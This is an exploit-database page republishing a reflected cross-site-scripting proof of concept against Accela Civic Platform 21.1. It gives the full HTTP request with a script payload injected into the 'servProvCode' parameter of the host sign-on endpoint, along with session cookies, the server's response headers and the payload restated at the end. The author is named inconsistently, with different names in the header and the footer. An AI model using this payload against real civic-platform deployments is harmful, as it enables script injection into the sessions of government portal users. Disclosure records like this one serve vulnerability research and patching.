Advertisement






Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)

CVE Category Price Severity
CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-14
CPE
cpe:cpe:/a:accela:civic_platform:21.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060079

Below is a copy:

Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
|===========================================================================
| # Exploit Title : Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
|                                                                           
| # Author : Ali Seddigh                                            
|                                                                           
| # Category : Web Application
|
| # Software Link: https://www.accela.com/civic-platform    
|                                                                           
| # Tested on : [ Windows 10 , KaliLinux ]                                                     
|
| # Version : 21.1
|                  
| # Date : 2021-06-14                                                       
|===========================================================================

================================================================
Accela Civic Platform Cross-Site-Scripting <= 21.1
================================================================


================================================================
Request Heeaders start
================================================================

GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1

Host: Hidden for security reasons

Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Upgrade-Insecure-Requests: 1

Te: trailers

Connection: close

================================================================
Request Heeaders end
================================================================



================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK

Expires: Wed, 31 Dec 1969 23:59:59 GMT

Cache-Control: no-cache

X-Powered-By: JSP/2.3

Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure

Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure

Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure

X-XSS-Protection: 0

Pragma: No-cache

Date: Sun, 06 Jun 2021 18:34:38 GMT

Connection: close

Content-Type: text/html;charset=UTF-8

Content-Length: 13222
================================================================
Response Heeaders end
================================================================


You can notice that the parameter "servProvCode" is vulnerable to XSS.
Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum